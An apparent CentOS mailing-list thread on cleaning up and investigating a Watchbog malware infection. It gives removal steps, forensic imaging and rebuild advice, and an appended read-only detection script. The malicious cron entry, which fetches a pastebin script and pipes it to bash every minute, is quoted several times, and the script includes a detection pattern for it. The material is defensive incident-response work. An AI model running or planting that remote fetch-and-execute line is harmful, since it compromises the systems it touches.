Valeri Galtsev wrote:
On 12/17/18 2:57 PM, Mauricio Tavares wrote:
On Sat, Dec 15, 2018 at 12:40 PM Kaushal Shriyan kaushalshriyan@gmail.com wrote:
Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently I am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html to carry out the steps below, which are done manually.
1) rm -fr /tmp/*timesyncc.service*
2) crontab -e -u apigee and delete the cron entry:
   */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
3) ps aux | grep watchbog
   kill -9 $(pidof watchbog)
Any suggestions or recommendations to find out how the CentOS 7.5 Linux box got infected with Watchbog malware? Is there any open source software which can be installed on a CentOS 7.5 Linux box to detect and prevent malware?
Do you have untampered log files?
Standard compromise recovery procedure since forever is (your local policy may have a slightly different order about notifications and similar):
- back up all user data
You should have been doing that all along.
First step, before you do anything else, is pull the hard drive, put it into a hot-swap or external bay, and dd the entire drive to an identical one. THAT goes to forensics.
Alternatively, pull the h/d, put in a new one, reset the BIOS to factory settings - that includes pulling the battery... *then* set what you need, and then build it new, and restore from backups. <snip> Why, yes, we did just do this, um, last year, after a compromise via a WordPress security hole. It did not manage to get to any other systems (we checked, and only a few run WordPress).
mark
On 12/18/18 8:31 AM, mark wrote:
Valeri Galtsev wrote:
On 12/17/18 2:57 PM, Mauricio Tavares wrote:
On Sat, Dec 15, 2018 at 12:40 PM Kaushal Shriyan kaushalshriyan@gmail.com wrote:
Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently I am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html to carry out the steps below, which are done manually.
1) rm -fr /tmp/*timesyncc.service*
2) crontab -e -u apigee and delete the cron entry:
   */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
3) ps aux | grep watchbog
   kill -9 $(pidof watchbog)
Any suggestions or recommendations to find out how the CentOS 7.5 Linux box got infected with Watchbog malware? Is there any open source software which can be installed on a CentOS 7.5 Linux box to detect and prevent malware?
Do you have untampered log files?
Standard compromise recovery procedure since forever is (your local policy may have a slightly different order about notifications and similar):
- back up all user data
You should have been doing that all along.
Do not exclude this from the [more or less] full list of the standard compromise recovery routine I tried to outline. Even though you had to do backups all the time, a backup at this point may have the latest changes not present in the latest routine backup. And you last had to restore something from your backup how many years ago? So your knowledge that that backup indeed works was tested years ago...
First step, before you do anything else, is pull the hard drive, put it into a hot-swap or external bay, and dd the entire drive to an identical one. THAT goes to forensics.
Indeed. Or adjust this part to "everything is hosted on a hardware RAID device", for which you will have to boot off DVD, mount and dump it all elsewhere for forensics.
But! Forensics is a different and sophisticated story, and when you learn it in depth, the first thing you will learn is: powering off the system, or even just disconnecting it from the network, may prevent you totally from learning several things about the compromise. But this is really a huge subject...
Alternatively, pull the h/d, put in a new one, reset the BIOS to factory settings - that includes pulling the battery... *then* set what you need, and then build it new, and restore from backups.
<snip> Why, yes, we did just do this, um, last year, after a compromise via a WordPress security hole. It did not manage to get to any other systems (we checked, and only a few run WordPress).
And yes, preventing, no matter how tedious it may seem, is orders of magnitude easier than recovering from a compromise. So: secure the box. And update, update, update....
Valeri
mark
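An added example, not part of the thread or of the blog post Kaushal cites: a read-only triage script for the three Watchbog indicators quoted above (the pastebin curl/wget piped to bash in a user's crontab, the /tmp/*timesyncc.service* dropper files, and the watchbog process). It only reports, so the findings can go into the incident record before the drive is pulled and imaged as mark and Valeri describe; the grep pattern and the function names are this example's own assumptions.

```shell
#!/bin/sh
# Added example (not from the thread). Read-only checks; nothing is killed or
# deleted, so the evidence stays intact for the disk image that goes to forensics.

# Return 0 and print matching lines if a crontab text contains a
# "fetch from pastebin, pipe to bash" entry like the one quoted in the thread.
check_crontab_text() {
    printf '%s\n' "$1" | grep -E '(curl|wget).*pastebin\.com/raw.*\|[[:space:]]*bash'
}

# Walk every local user's crontab (needs root to read other users' tabs).
# Return 0 if any suspect entry was found, 1 otherwise.
scan_all_crontabs() {
    found=1
    for u in $(cut -d: -f1 /etc/passwd); do
        tab=$(crontab -l -u "$u" 2>/dev/null) || continue
        if check_crontab_text "$tab" >/dev/null; then
            echo "SUSPECT crontab for user $u:"
            check_crontab_text "$tab" | sed 's/^/    /'
            found=0
        fi
    done
    return $found
}

# Dropper files and process name from the post. Owner and mtime of each file
# are printed because they are the first thing forensics will ask for.
scan_files_and_procs() {
    found=1
    for f in /tmp/*timesyncc.service*; do
        [ -e "$f" ] || continue
        echo "SUSPECT file: $f ($(stat -c '%U %y' "$f"))"
        found=0
    done
    if pids=$(pgrep -x watchbog); then
        echo "SUSPECT process watchbog, pid(s): $pids"
        found=0
    fi
    return $found
}

# Constructed sample (the cron entry as quoted in the thread) for a self-test.
SAMPLE_CRON='*/1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1'
BENIGN_CRON='0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf'

# Live scan only when invoked as: sh watchbog-triage.sh --scan
if [ "${1:-}" = "--scan" ]; then
    scan_all_crontabs; scan_files_and_procs
fi
```

Run it as root with --scan on a box you suspect; a clean system prints nothing and both scan functions return 1.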
CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos